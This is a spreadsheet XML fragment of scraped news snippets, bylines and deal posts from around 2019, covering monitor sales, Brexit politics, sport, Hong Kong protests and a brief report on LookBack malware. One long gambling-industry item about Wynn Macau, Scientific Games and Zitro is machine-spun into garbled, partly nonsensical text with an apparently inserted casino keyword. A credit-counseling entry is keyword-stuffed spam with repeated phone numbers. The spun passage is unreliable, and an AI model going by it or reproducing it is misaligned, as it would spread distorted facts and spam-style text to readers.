    <t>Amazon US has up to 25% discount on a range of LG displays, including a handful of smart choices if you want to enhance your gaming platform. The best of the lot is this 34W UltraSide 21: 9 IW 34WK650-W LG monitor for $ 249.99. The 2018 model here is both HDR10 compatible and features AMD FreeSync technology to better eliminate screen tears and stuttering. With over $ 150 off the regular price, it's a big screen for your money! About half a dozen other monitors have also been scaled down for the LG sale. Some will damage your bank balance much less than others while taking up much less space on your desk. Take this LG 24MP59G-P 24 "gaming monitor for $ 115.99, for example. It's 10 inches shorter and a year older than the UltraWide monitor above, but it might be a better option if you're looking for something more reserved. However, it offers AMD FreeSync, while displaying a response time of 1 ms and a refresh rate of 75Hz. Not very upscale so, but more than competent for a mid-range gaming installation. If none of these solutions are right for you, you can browse the full list of LG monitors on sale to see if there is another selection that best suits your needs. Looking for more offers? You should be interested in Jelly Deals where we have the best PS4 external hard drives, a collection of the best Nintendo Switch SD cards and a preview of the best food banks in 2019. This LG 34WK650-W 34W UltraWide IPS Monitor is down to $ 249.99 at the moment at Amazon US first appeared on VG247.</t>
  </si>
  <si>
    <t>I Hunger For You and Medium draw on a different body inheritance and with a vastly different result.</t>
  </si>
  <si>
    <t>Adele Ferguson</t>
  </si>
  <si>
    <t>A massive leak of documents has prompted questions about how close the nation's big banks are to their auditors.</t>
  </si>
  <si>
    <t>In 1986, a tip-off to The Age led police to Spencer Street Train Station. Picasso's 'Weeping Woman', stolen from the NGV, was found inside locker 227.</t>
  </si>
  <si>
    <t>About $60,000 has been awarded to solar panel projects in the latest round of funding from the Alcoa Harvey Waroona Sustainability Fund.</t>
  </si>
  <si>
    <t>EASTENDERS’ most secretive resident Iqra Ahmed has begun to reveal more about her double life, recently opening up to sister Habiba Ahmed about her sexuality. However, will her grandparents reject Iqra when her girlfriend arrives on the Square? Daily Express :: TV and Radio Feed EastEnders spoilers: Iqra Ahmed crushed as she’s rejected by family over new romance?</t>
  </si>
  <si>
    <t>The launches are seen as a reaction to planned military exercises between South Korea and the US. The post North Korea launches third ‘projectile’ in eight days appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>A suicide bomber targets guests at a Shia marriage in the Afghan capital. Initial reports say many of the victims were women and children. Also: a landmark deal between Sudan’s military and the civilian opposition, and why a woman may be the next person to walk on the Moon</t>
  </si>
  <si>
    <t>The stature of Heroes of the Storm in the snow storm pantheon has certainly suffered a lot in recent years, but the studio continues to provide new updates. The last fix brings some pretty fundamental changes to how grading and matching work. So we asked the game designer Adam Jackson what exactly was the intention of these changes. "In previous seasons, the matchmaker has taken into account both the player's rank and his MMR to create games," Jackson said. "This created strange situations, especially for players whose rank and MMR were strongly deviated one from the other." Now your rank in the Storm League is directly mapped to your MMR. Overall, this will make the matches more balanced compared to the previous one, because the skills of each player will be measured more accurately. " In addition, the ranking matches went from 10 to 3, and Blizzard believes that the preseason tests were sufficient to ensure the proper functioning of this placement. "If the placement system goes wrong one way or another, we'll find the problem and deal with it appropriately."</t>
  </si>
  <si>
    <t>All season long, the opening bars of Andre Nickatina’s “Jungle” have brought the fans at Miller Park to their feet, The rapper’s 2002 hit has been Yelich’s walk-up tune but Tuesday night, when he came to the plate in the first inning of the Brewers’ divisional showdown with the St. Louis Cardina… Source: Sports Business News</t>
  </si>
  <si>
    <t>Over the past few months, your news feed has no doubt been flooded with footage from Hong Kong’s massive pro-democracy protests.</t>
  </si>
  <si>
    <t>Felicity Caldwell</t>
  </si>
  <si>
    <t>The aged care royal commission has heard 20 reports of alleged physical and sexual abuse at one operator's facilities were not escalated by the Department of Health.</t>
  </si>
  <si>
    <t>The 52-year-old’s career from has reportedly generated a whopping $1.5 billion in ticket sales, making him one of Hollywood’s most bankable action stars. See full article at Film-news.co.uk » The post Kelly Brook blasts ex Jason Statham: 'He was skint' appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>David Prestipino</t>
  </si>
  <si>
    <t>Residents in Carine were left shocked and a little shaken when a violent ice storm dropped a flurry of hail in a hurry that blanketed their suburban street with ice on Monday afternoon.</t>
  </si>
  <si>
    <t>Shopback have also increased the cashback for the following categories - Books 15% Office &amp; Stationery 15% Pets 15% Health &amp; Personal Care, Personal Care Appliances, Luxury Beauty 15% Groceries 15%</t>
  </si>
  <si>
    <t>PHILADELPHIA — Jerome L. wanted to tell the public about how he was incarcerated at 15 and is still serving his sentence at 55, and that those contemplating a life of crime should consider that they, too, could end up serving a long prison sentence. So Jerome, an inmate of the State Correctional Institution at Chester, Pa., signed up for a yearlong program in which he and 19 other prisoners created animated videos that will be projected from a coffee shop onto the outer wall of Eastern State Penitentiary, a former prison in Philadelphia, starting on Aug. 15. The videos, only a minute or two each, tell personal stories that involve the inmates’ regrets over missing their children’s growing up; the stark realities of being imprisoned; and the process of taking responsibility for their crimes. One of the videos was made by inmates at Riverside Correctional Facility, a women’s prison run by the City of Philadelphia. “We’re hoping people recognize the humanity of people who are incarcerated,” said Sean Kelley, senior vice president and director of interpretation at Eastern State Penitentiary, which closed in 1971 and is now a museum whose mission recently shifted to focus on mass incarceration and criminal justice reform. “People in prison are trying to rewrite the narrative of what their life means, and to make a positive impact on the world.” Inmates wrote scripts for their videos, recorded narratives in their own voices, and drew or compiled the visual elements, Mr. Kelley said. They were not permitted to refer to their crimes or their victims, to depict violence or to use profanity. Several early drafts were revised at the direction of the Department of Corrections, he said. As with any animation project, it was painstaking and sometimes tedious, but several of the inmates at the Chester prison said in interviews that it was also a cathartic and uplifting exercise that offered them a chance to communicate with the outside world. (The inmates were interviewed on the condition that their last names not be used. Mandee Quinn, assistant to the superintendent of the institution at Chester, said the Department of Corrections wanted to highlight the video program rather than the participants.) Jerome, who is serving a 50-year sentence, said it’s painful to think about what his life could have been. “It hurts so much that if I could change someone else’s life to stop them going through what I went through, then this is what I want to do,” he said in an interview in the prison chapel earlier this month, when the videos were shown to reporters. His video, which runs about a minute and a half, begins with a drawing of a tearful young boy whose head contains images of the drugs, guns and money that led to Jerome’s incarceration, as well as of the court system and the prison where he now lives. “Coming to prison at a young age was like a wake-up call,” Jerome says in the narrative. “It was like entering the gates of hell with no roses to lead the way but, instead, thorns.” Still, he says, he has not allowed prison life to destroy him, or to “stop me growing into a man.” Justino G., 47, whose sentence began in 2009 and who expects to serve another couple of years, said he wanted to make a video to pay homage to his 15-year-old son, a pianist, and to shift public perceptions about prisoners. “In spite of the mistakes that guys like myself have made in the past, there is redemption,” he said. “Given a chance, we can show that we have human qualities, that we can change. We have so much to offer to the world.” Hidden Lives Illuminated From Aug. 15 through Sept. 12 at Eastern State Penitentiary; 2100 Fairmount Ave., Philadelphia; easternstate.org. Source link</t>
  </si>
  <si>
    <t>Iran has produced highly accurate missiles that it has not publicised, Iranian Deputy Defence Minister General Qassem Taqizadeh says, according to the semi-official Fars news agency.</t>
  </si>
  <si>
    <t>Pats part ways with WR Thomas; Andrews to IR Original Source It had all the pomp and circumstance of the beginning of a marvelous comeback story when Demaryius Thomas returned to action in Week 4 of the preseason with his Patriots debut. Unfortunately for the veteran receiver it could be his last appearance with the Pats, as they are releasing Thomas, who is still working back from a torn Achilles, NFL Network Insider Ian Rapoport reported Saturday. However, NFL Network’s Michael Giardi added that there is a chance for a quick return as sources indicate that’s the desire for the team and receiver. While Thomas was released, Patriots center David Andrews was placed on season-ending injured reserve, Rapoport reported. Earlier in the week, Andrews was hospitalized for a blood clot in his lungs. While Andrews was released from the hospital, he will not return to the team this season and the Patriots are left to replace their four-year starting center. That plan is already in flux after trades for linemen Korey Cunningham and Jermaine Eluemunor during the week. Back on Thursday, Thomas led the way as he, Josh Gordon and Julian Edelman made their returns to the field with their Patriots preseason debuts. Thomas collected a pair of touchdown grabs, but it apparently wasn’t enough to grab a spot on the 53-man roster. Thomas’ cut wasn’t the only notable departure of the day for New England, which also parted ways with longtime backup QB Brian Hoyer, leaving rookie Jarrett Stidham, who tossed both of those TDs to Thomas, as Tom Brady‘s No. 2. Following a long and sterling showing of eight-plus seasons with the Broncos in which he collected four Pro Bowl tickets, Thomas was traded mid-season to the Texans in 2018. He ended the season on IR with the Achilles injury, though. The Pats picked him up in April and after his one and only August showing it looked as if Thomas might be the team’s latest reclamation project. Perhaps it still could be.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Pats part ways with WR Thomas; Andrews to IR appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/8/15/20807845/june-smart-oven-app-update-remote-preheat June will immediately change its app interface to prevent smart ovens from turning on accidentally Photo by Amelia Holowaty Krales / The Verge Smart home appliance maker June is planning an immediate update to its iOS and Android apps to prevent users from accidentally turning on the company’s smart ovens. The updates don’t remove the ability to remotely preheat the oven, but they do put more button taps between opening the app and starting a preheat, which could help avoid accidents. The Verge reported yesterday that a few June Oven owners experienced their ovens turning on overnight and preheating to 400 degrees Fahrenheit and higher without their knowledge. The company said the preheats were the result of user error — effectively people accidentally triggering their ovens without realizing it. The company planned two updates to address the issue, and it now says it’s moving… Continue reading… Source: https://www.theverge.com/2019/8/15/20807845/june-smart-oven-app-update-remote-preheat The post June will immediately change its app interface to prevent smart ovens from turning on accidentally appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Tom Bawden</t>
  </si>
  <si>
    <t>The motoring industry has strongly welcomed government plans to cut fuel duty for the first time in almost a decade. Boris Johnson wants the cut to form part of an emergency budget by Chancellor Sajid Javid and help pave the way for a general election, according to media reports. Fuel duty has been frozen by the Government for nine consecutive years and stands at 57.95 pence per litre for petrol and diesel. The proposal will benefit Britain’s 37 million car drivers as well as industry, by sharply reducing distribution costs, advocates said. Move welcomed by motoring industry “This will help the world’s already highest taxed drivers to increase their consumer spending. It will reduce inflation, prices in the shop, increase tax revenue to the Treasury and massively support hard pressed hauliers during this time of Brexit upheaval. A true vote winner,” said Howard Cox, founder of FairFuelUK campaign group. Christopher Snelling, of the Freight Transport Association, said: “This would be excellent news…. A cut would massively stimulate the UK economy whilst mostly paying for itself as Government would get more tax from other sources as a result.” Air pollution campaigners likely to be disappointed Although the move has been welcomed by business and consumers, environmental campaigners will be disappointed amid suggestions that fuel duty should be increased to discourage driving and reduce air pollution. The Bright Blue think tank said in a report this month that Britain’s departure from the EU provided an opportunity to raise air pollution standards and suggested removing the existing freeze on fuel duty. “We recommend ending the freeze on the value of fuel duty from the next tax year. In addition, diesel fuel should attract a surcharge of fuel duty in its sale. This could be badged as a ‘Diesel Duty’,” the report said. More on motoring Thousands of drink drivers caught behind the wheel multiple times Ford Fiesta ST review – hot hatch harnesses the power of three Dramatic footage shows runaway trailer veering across three lanes of busy motorway August bank holiday travel – warning of record delays as millions hit the roads The new Audi RS6 Avant is a 592bhp hybrid monster Fake driving instructors are conning students – here’s how to check if your teacher is a fraud The post Motoring industry welcomes Boris Johnson’s plan to cut fuel duty appeared first on inews.co.uk. The post Motoring industry welcomes Boris Johnson’s plan to cut fuel duty appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>robbbyrob</t>
  </si>
  <si>
    <t>Previous deal on OB and back again. Currently $16 on sale at Coles. WARNING - Product reviews do not look promising 1.5/5stars from 201 reviews https://www.productreview.com.au/listings/nescafe-gold-origi... Good for coffee drinkers.. or chew on it as a pre-workout supplement.</t>
  </si>
  <si>
    <t>Source: https://arstechnica.com/?p=1544925 New advanced malware, possibly nation sponsored, is targeting US utilities (credit: Maëlick / Flickr) A new piece of advanced espionage malware, possibly developed by a nation-supported attacker, targeted three US companies in the utilities industry last month, researchers from security firm Proofpoint reported on Thursday. Employees of the three unnamed companies, as Proofpoint reported, received emails purporting to come from the National Council of Examiners for Engineering and Surveying. This non-profit group develops, administers, and scores examinations used in granting licenses for US engineers. Using the official NCEES logo and the domain nceess[.]com, the emails said that the recipients failed to achieve a passing score on a recent exam. The attached Word document was titled Result Notice.doc. (credit: Proofpoint) Malicious macros embedded into the document attempted to install a package of full-featured malware Proofpoint calling LookBack. Components included a remote-access trojan written in C++ and a proxy tool for communicating with a command-and-control server. Once LookBack is installed, it gives attackers a full range of capabilities that include: Read 8 remaining paragraphs | Comments Source: https://arstechnica.com/?p=1544925 The post New advanced malware, possibly nation sponsored, is targeting US utilities appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>As cordons are lifted and residents return home, a look at how the town escaped possible disaster. The post Whaley Bridge dam repair: How events unfolded appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Acting as a teaser or taster for things yet to come to the Grimm Universe, we get a selection of short stories for Fall 2019 As the Grimm Universe continues to grow, new adventures await the many heroes that reside inside it. Don’t miss this 64-page issue of epic proportions, as we get 5 all-new, never-released short stories, spanning from all corners of the realms of power, leading into the future of all things Grimm!Writers: Joe Brusha, Ralph Tedesco, Dave Franchini Artwork: Igor Vitorino Red Agent kicks us off with ‘Safehouse’ It’s a short story, but it continues the problems that she has been having, and is quite action packed. I thought the ending was a little ‘nuke the fridge’ but nevertheless, I liked the leading ending we got. There is a good amount action, magic and intrigue! Belle: Liberty gives us some good old fashion monster hunting next. It’s pretty much all monster fighting, with Candlestick in support. The creepy figure watching is interesting – there does seem to be a lot of those about! Following on from her latest mini-series Robyn is back in ‘Pro Bono’ taking ona task of finding a missing kid. This was interesting as we know Robyn is having some problems and we get a closer look at those behind it all. We still haven’t got any ‘why’s yet though! I did enjoy the fight scene. From the Grimm Universe to the Grimm Tales of Terror in the next story and this looks to be a build up to a later story. I really enjoyed it though – a good origin, with some excellent art. I wonder where it will lead, but I bet it will be gruesome! (another area I was unaware of the myths around too!) Finally a nice demon fighting story from Mystere in “With A Little Help From My Friends”. I like that Mystere is still learning about her powers and the way this one was fought, it made sense. Talking of sense, this gives a nice sense of direction! A good taste of what is to come from the Grimm Universe! The post Review: Grimm Universe Presents: Fall 2019 appeared first on 3 Million Years.</t>
  </si>
  <si>
    <t>Saudi Aramco's CFO said the company is ready for an initial public offering, but the timing will be up to its owner, the Kingdom of Saudi Arabia.</t>
  </si>
  <si>
    <t>Foreign Minister Marise Payne said the Australian government was "very concerned and disappointed" at the arrest of Yang Hengjun.</t>
  </si>
  <si>
    <t>Boris Johnson has apparently appealed to Donald Trump to help make George Osborne the next head of the International Monetary Fund. Read more? Click here</t>
  </si>
  <si>
    <t>Affordable homes will be built for older, single women in Adelaide’s western suburbs to provide more housing for the fastest-growing group of Australians at risk of homelessness.</t>
  </si>
  <si>
    <t>McLaren were pleased after both Carlos Sainz Jr. and Lando Norris made into Q3 with the Brit seventh and the Spaniard eighth Norris was pleased to have to secured his eighth appearance in Q3 after being knocked out in Q1 last time out in Germany. “A good qualifying. Compared to Hockenheim last week, it was a good improvement and it’s nice to be back in Q3 again. It wasn’t easy; it was still close together in the midfield, but I’ve felt comfortable in the car all weekend and I was always reasonably happy, massive thanks to the team at the track and everyone back at the factory. Now we just need to convert our quali form in the race.” Sainz’s was also happy after making Q3 for the sixth time this season, and his third appearance in Q3 at the Hunagaroring in his F1 career. “I think it’s a positive day for the team. Coming into the weekend we weren’t so sure about the performance on this track, but we managed to make the right decisions with the set-up going into Saturday, and we put both cars in Q3. Sainz suffered with balance issues in Q1, however they were rectified to see him improve on his times in all three sessions. “I started off Q1 with some balance issues, but we managed to sort them out through the session, improving every time I went out and finally doing a good lap on my last attempt in Q3. Seventh and eighth is great news for the team on this track and we can race from there tomorrow.” Team principal Andreas Seidl now thinks McLaren is the fourth best team on a circuit which may have not suited the MCL34. “Well done to the whole team for another well-executed qualifying session. It’s only the second time this year we’ve managed to get both cars into the top-eight. “Carlos and Lando did an excellent job, improving progressively through the sessions, but this was a real team effort, both here at the track and back at MTC. Collectively, the team is working incredibly hard to identify the limitations of the car and devise solutions. It’s getting better all the time with updates from the aero department adding performance constantly. “We were clearly the fourth-fastest team today on a track which, on paper, didn’t look like being particularly strong for us. “Of course, nobody scores points on Saturday, so we’ve got to get our heads down now and work hard on race preparation. We have a really good platform from which to deliver a strong result tomorrow.”</t>
  </si>
  <si>
    <t>Declan McDaid is hoping East End Park lightning can strike twice as he travels to a happy hunting ground with his new side, Dundee.</t>
  </si>
  <si>
    <t>Carmelo Anthony made it clear he ready to do whatever it takes to get back into the league. Source: Sports Business News</t>
  </si>
  <si>
    <t>McDonald’s is advising customers to bin their paper straws after finding they are not recyclable. Read more? Click here</t>
  </si>
  <si>
    <t>PLAY ENGLISH BELARUSIAN FLASHCARDS FREE Select English or Belarusian, then select your answer to the prompt word from the four options. Have fun 😉 Republished by Blog Post Promoter</t>
  </si>
  <si>
    <t>A prison inmate who escaped from a hospital while under Corrective Services supervision on the NSW Mid North Coast has been tracked down by a police dog and arrested by officers in Frederickton.</t>
  </si>
  <si>
    <t>Nick Duffy</t>
  </si>
  <si>
    <t>Conservative rebels Dominic Grieve, David Gauke and Sir Oliver Letwin have signalled that they will not give their backing to a government of national unity if it is led by Jeremy Corbyn. The Tory ex-ministers, who have repeatedly rebelled in Parliament over plans for a no-deal Brexit, spoke out after Mr Corbyn proposed himself as the leader of a unity government if Boris Johnson is removed from power. Former Cabinet Office minister Sir Oliver Letwin told the BBC’s Today programme on Saturday: “That appears to be [Mr Corbyn’s] agenda, I have to say it is not one I personally share. “I don’t think it’s at all likely that a majority would be formed for that and I personally wouldn’t want to vote for it. I wouldn’t be able to support that, no.” ‘Deeply divisive’ Speaking on Friday, former Attorney General Mr Grieve made clear: “I believe a no-deal Brexit would be catastrophic… [and] I’m prepared to speak to any parliamentarian who shares that view, including the leader of the opposition. “If he is against no deal, I’m happy to talk. That is very different to thinking he is an appropriate figure to lead a government. “Jeremy Corbyn is unfortunately a deeply divisive figure and in trying to stop a no-deal Brexit it is not my purpose to help him into Downing Street.” Meanwhile, former Justice Secretary Mr Gauke tweeted: “If anyone thinks the answer is Jeremy Corbyn, I think they’re probably asking the wrong question.” Wrong question Former Conservative MP Anna Soubry, the current leader of Change UK, also signalled that her five-strong group of MPs would not permit Mr Corbyn to become Prime Minister. She said in an email to supporters: “To suggest, as a significant number of MPs from the other political parties have, that they should back Corbyn in a vote of no confidence and hand him the keys of No 10 is verging on the outrageous. “We will not support nor facilitate any Government led by Jeremy Corbyn.” Dominic Grieve had previously rebelled in Parliament in order to block a no-deal Brexit. (Photo by Victoria Jones/PA Wire) The failure of MPs to coalesce round a unity candidate could spell trouble for Mr Corbyn’s plot given the narrow margin within Parliament, where the Conservatives have a working majority of just one. Mr Corbyn had sought talks this week with the Liberal Democrats, Scottish National Party, Green Party, Plaid Cymru and Conservative rebels including Mr Grieve and Sir Oliver. No unity Liberal Democrat leader Jo Swinson has called for Ken Clarke or Harriet Harman to take the role of a caretaker Prime Minister, warning that Mr Corbyn’s bid is doomed to failure. She warned that “the numbers don’t stack up” for Mr Corbyn because he is “divisive” and too many MPs have ruled out supporting him. Read more: What is a government of national unity? How the plan to stop no-deal Brexit would work, and when it’s been done before Ms Swinson said: “Conservative MPs are very clear they are not about to put Jeremy Corbyn in Number 10.” However, Jeremy Corbyn hit back: “It’s not up to Jo Swinson to choose candidates, it’s not up to Jo Swinson to decide who the next prime minister is going to be. “Surely she must recognise she is a leader of one of the opposition parties who are apparently opposed to this Government, and apparently prepared to support a motion of no confidence.” More Politics Ken Clarke offers to take over as Prime Minister to 'sort Brexit out' Jeremy Corbyn vows to save struggling high streets UK offers help in fight against plastic pollution from cruise ships Unity fails to find leader for a National Unity Government Could Corbyn become PM without a general election? Clyde's last commercial shipyard nationalised to save it from closure The post No-deal Brexit: Tory rebels Dominic Grieve and Oliver Letwin rule out backing Corbyn ‘unity’ government appeared first on inews.co.uk. The post No-deal Brexit: Tory rebels Dominic Grieve and Oliver Letwin rule out backing Corbyn ‘unity’ government appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>A restaurant chain ultimately owned by the global luxury brand Louis Vuitton Moet Hennessy has signed a 10-year lease for a Melbourne Chinatown building.</t>
  </si>
  <si>
    <t>Top-ranked defending champion Naomi Osaka advanced to the third round of the US Open by defeating Poland’s 53rd-ranked Magda Linette 6-2 6-4.</t>
  </si>
  <si>
    <t>Wynn Macau Limited benefits landmark field process in Malaysia. Medical Movie enterprise rolls out PlayCentral 54 accident progression. Casino Cafe parisienne unveils videos lotto innovative developments In Malaysia, a fast courtyard justice reportedly produced rating on week by purchasing local area bettor, john Poh Yang Hong, to repay the entirety off of a personal debt you purportedly gone up while playing on the quality casino had by Wynn Macau small. Significant investment: In accordance with A thursday submit out of your Reuters thing help syndicated with the Malay post papers, the opinion from estimate, second Nantha Balan, is tremendously memorable although it represents the time that is first brick &amp; mortar casino institution possess ever been allocated approval to recover a gambling-related money trouble in the united kingdom. Recognition contract: Reuters stated that Malaysia’s system that is judicial typically no recognized international video gaming or gaming jobs but Wynn Macau, which is the Asian equip of Sin city Vegas-headquartered Wynn hotels small, got obtained their own practice after swaying the Kuala Lumpur act in which the opponent got finalized a credit history rating understanding relating to your debt worth slightly over five dollars million. The news servicing reported that fund manager Poh ever had got into a tough time while delighting a wagering procedure around the Wynn Macau together with later debated that he were unacquainted with getting ever signed a real commitment at the identity. Precedent opportunity: Reuters reported an attorney at law concentrating on account coming from the Hong Kong-listed site agency, Vincent Law, as explaining that Poh included was able to be beneficial some $800,000 of his new loans before really being charged in 2017. This reported that the opinion suggests that the unit has is located on the hit for approximately $4.2 million plus interests although there is truly a risk you might draw the decision. Statute to Reuters… “If there’s no charisma, I am certain this wisdom now will be the regulation in Malaysia on the future that is foreseeable. This is usually a quite indication for the pc gaming market place.” European accident and gamer magnetic energy generators pioneer, logical game group, maintains launched that hot weather have unrolled really it’s PlayCentral 54 self-service improvement for sellers throughout the continuing says of scottsdale and missouri. Self-service coziness: The Las Vegas-headquartered firm used the official friday blog post (pdf) to play his or her PlayCentral 54 invention was soon specially manufactured for your notable retail store on the country and will now works zodiac casino fake as the industry’s ‘only low-height gamer self-service mechanism.’ Fast superiority: SG Corp displayed this snapshot originally displayed your PlayCentral 54 move forward of the us organization of region and Provincial Lotteries’ yearly gathering in June. Things further stated about the progress was built to aid websites’ ‘convenience and speed-of-service’ by featuring ‘a brisk shopping cart solution check-out adventure’ that resembles countless online shops. Installing: Pat McHugh, Lottery business Vice-President for conventional mmorpgs Corporation, professed that his very own firm’s PlayCentral 54 invention accumulates solely 54 centimetres beautiful to assist you to complement couple’ up-to-date self-checkout facilities and provides pros the cabability to buy choice of betting games like scratchcards cash that is utilizing account stickers and electronic services in particular Microsoft income or Google digest. McHugh’s line browsed… “Lotteries will continue to update by session professionals the place where these are and exactly how that they like playing, whether at their own town food or convenience store, to obtain a most important box that is big, in their homes or while on the road employing their mobile phones. This mission is yet another instance of how well research adventure provider comprehends which enable it to achieve lotto websites’ distinct desires and still provide drawing fans the aforesaid devices that there is with a lot of alternate user solutions from their lives.” Game coffee maker programmer, Zitro SARL, comes with revealed the signing connected with a contend with local Monegasque gaming website rider, Societe des Bains de Mer (SBM), that comes with personally seen really it’s training video bingo innovations unveiled in golfers included in the Casino that is iconic Cafe town. Influential driver: The Luxembourg-based tone is a lot responsible an array of video recording slot and bingo games machines and practiced formal monday news release revealed by American casino reports and functions to facts that SBM usually powers local Casino de Monte-Carlo, Sun Casino and Monte-Carlo Bay Casino. Creator is justly ‘enormously grateful’: Nadege Teyssedre, the western world, Middle Eastern Countries and Africa location home for Zitro SARL, mentioned that their business is generally ‘enormously grateful’ to SBM for appearing the casino that is first in Monaco to debut her variety of online bingo equipment. Teyssedre’s report browsed… “We are convinced that the prospects transferred throughout our digital bingo games workout machines will probably be surpassed and also now we reliance that it will help us at some point to nurture the existence of my programs from the on line casino of SBM, and that’s an user of reference in European countries and every where.” Fairly that is‘unknown: For his / her step, Pascal Camia, playing surgery management Vice-President for SBM, described videos lotto as ‘a exceptional and modern concept’ which was somewhat ‘unknown as yet’ to members in Monaco. Camia’s statement heard… “We dreamed it has been wise to expose clips bingo into my activity in the possession of out of prominent specialist concerned with these sorts of gizmos. Our company is thinking that, thanks to the film lotto units from Zitro SARL, all of our clients might find latest incidents, fun and recreational.”</t>
  </si>
  <si>
    <t>Protesters in Hong Kong stood side by side to form human chains across the city on August 23, emulating the Baltic Way demonstration on its 30th anniversary. This timelapse shows a largely unbroken chain from Hong Kong’s Times Square to Tin Hau, a distance of about a mile, per Google Maps. Thousands of accountants marched earlier in the day, carrying signs listing the protesters’ five demands, including the implementation of universal suffrage and an investigation into the use of force by police during previous protests. Protests in Hong Kong have been ongoing for months, initially prompted by a proposed extradition bill that would allow suspects to be transferred to mainland China. The 1989 Baltic Way was organized by pro-independence groups in Estonia, Latvia, and Lithuania as a protest against Soviet rule. Credit: Galileo Cheng via Storyful</t>
  </si>
  <si>
    <t>Gareth Lee, who ordered the cake from Ashers bakery, is going to the European Court of Human Rights. The post Ashers ‘gay cake’ row referred to highest European Court appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Product Features: The only bin that individually seals each nappy for unbeatable odour block Antibacterial multi-layer film kills 99% of germs New efficient Twist &amp; Click system for less waste, less film used each wrap 100x more effective than nappy sacks New space-saving flat lid and carry handle New on trend colours to suit every home (NB. Only white showing online) Includes 1 refill (lasts up to 1 month) PLUS 30% off refill cassettes: Tommee Tippee Twist and Click Advanced Nappy Disposal System Refill Cassette $10.50 Tommee Tippee Twist and Click Advanced Nappy Disposal System Refill Cassettes 3 Pack $27.30 Tommee Tippee Twist and Click Advanced Nappy Disposal System Refill Cassettes 6 Pack $45.50</t>
  </si>
  <si>
    <t>Jesse Ferreras</t>
  </si>
  <si>
    <t>Connor Betts' family says they're coping with the loss of both their son and daughter, who was killed in the shooting.</t>
  </si>
  <si>
    <t>The post Lucas &amp; Steve – Creamfields Festival 2016 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Can Nasrat Haqparast Make A Move At Lightweight? Original Source Share to facebook Share to twitter Share to linkedin MONCTON, NB – OCTOBER 27: (R-L) Nasrat Haqparast of Germany punches Thibault Gouti of France in their lightweight bout during the UFC Fight Night event inside Avenir Centre on October 27, 2018 in Moncton, New Brunswick, Canada. (Photo by Jeff Zuffa LLC via Getty Images Nasrat Haqparast has been impressive in his three-fight run with the UFC. At UFC on ESPN 5, the 23-year-old German looks to take another step up the lightweight ladder when he faces Joaquim Silva on the main card of Saturday’s event. Haqparast lost his first fight as a pro. He then proceeded to win his next eight contests by knockout. That streak came to an end against Marcin Held at UFC Fight Night 118. Since then he has won two decisions in the UFC, most recently scoring a “Fight of the Night” bonus for his October 2018 victory over Thibault Gouti. Haqparast is an all-offense fighter. He uses fast and powerful combinations and odd angles to keep his opponents guessing. During his win over Gouti, he attempted 282 strikes and landed 148. One issue that could plague the up-and-coming lightweight is that he does throw a lot of wide punches. That style could leave him open to counterstrikes against a fast and cagy opponent. Haqparast was the biggest favorite on the card when he faced Gouti. He’s not the biggest favorite at Saturday’s event in New Jersey, but he’s still a substantial favorite over Silva, who is coming in off a “Fight of the Night” knockout win over Jared Gordon in December. The 30-year-old Brazilian is 4-1 in the UFC and 11-1 overall. His only loss was a 2018 decision to Vinc Pichel. This matchup is a step up in competition for Haqparast and it should give fans and the UFC matchmakers a pretty good idea of where he stands in the deep lightweight division. UFC on ESPN 5 takes place at Prudential Center in New Jersey. ESPN broadcasts the entire fight card. Pick: Haqparast More from this series: UFC On ESPN 5 Preview And Picks: Business Picks Up In Women’s Flyweight Division UFC On ESPN 5 Preview And Picks: It’s Moving Time In The Flyweight Division UFC On ESPN 5 Preview And Picks: How Is Mickey Gall’s Health? Follow us on Twitter Original Source The post Can Nasrat Haqparast Make A Move At Lightweight? appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>A corruption inquiry into NSW Labor has opened with sensational claims that one key witness died by suicide rather than give evidence.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Omaha, Nebraska Consumer Credit Counseling Service | (888) 551-1270 Monday 12 August 2019 03:38 PM UTC-05 | Tags: omaha-nebraska-consumer-credit-counseling-service-888-551-1270 https://youtu.be/sUrQthk9d5o Omaha, Nebraska Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Wage Garnishment and Vehicle Repossession solutions, Mortgage Loan Modification, and Debt Settlement through chapter 13. Omaha, Nebraska Credit counseling (888) 551-1270 starts with the parent and may include intermediaries later in life empowered by the individual debtor to act on their behalf to negotiate with creditors and resolve debt that is beyond a debtor's ability to pay. Credit counseling is a generic name and is not a brand name owned or controlled by any agency or company. Omaha, Nebraska Consumer credit counseling services (888) 551-1270 are provided by attorneys, accountants, finance and tax professionals, for-profit, and non-profit credit counseling companies. Regulations on credit counseling and credit counseling agencies varies by country and sometimes within regions of the countries themselves. In Omaha, Nebraska individuals filing Chapter 13 bankruptcy are required to receive counseling from a designated credit counseling agency. https://www.youtube.com/channel/UCXDuAASeBS53Eqmi4ZxKF2g/about https://t.co/JqMKB0967s — Texas Consumer Credit Counseling Service (@GeneroSebastian) July 17, 2019 https://twitter.com/GeneroSebastian/status/1151303898587471873 Tags: omaha-nebraska-consumer-credit-counseling-service-888-551-1270</t>
  </si>
  <si>
